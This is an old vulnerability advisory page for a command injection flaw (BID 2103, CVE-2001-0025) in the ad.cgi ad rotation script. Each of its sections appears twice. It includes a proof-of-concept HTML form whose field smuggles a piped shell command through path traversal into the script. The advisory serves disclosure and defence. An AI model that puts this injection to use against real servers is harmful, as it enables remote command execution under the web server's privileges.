Leif M. Wright ad.cgi Unchecked Input Vulnerability
BID:2103
Info
Leif M. Wright ad.cgi Unchecked Input Vulnerability
| Bugtraq ID: | 2103 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0025 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 11 2000 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | This vulnerability was first announced by rpc <[email protected]> via Bugtraq on December 11, 2000. |
| Vulnerable: |
Leif M. Wright ad.cgi 1.0 |
| Not Vulnerable: | |
Discussion
Leif M. Wright ad.cgi Unchecked Input Vulnerability
ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources.
The problem occurs in the method in which the script checks input. Due to insufficent validation of input, the script allows a user to execute programs on the local system by making use of the FORM method. This makes it possible for a malicious users to remotely execute commands on the system with the priviledges inherited by the HTTPD process.
ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources.
The problem occurs in the method in which the script checks input. Due to insufficent validation of input, the script allows a user to execute programs on the local system by making use of the FORM method. This makes it possible for a malicious users to remotely execute commands on the system with the priviledges inherited by the HTTPD process.
Exploit / POC
Leif M. Wright ad.cgi Unchecked Input Vulnerability
From the advisory by rpc <[email protected]> :
<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
From the advisory by rpc <[email protected]> :
<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
Solution / Fix
Leif M. Wright ad.cgi Unchecked Input Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Leif M. Wright ad.cgi Unchecked Input Vulnerability
References:
References: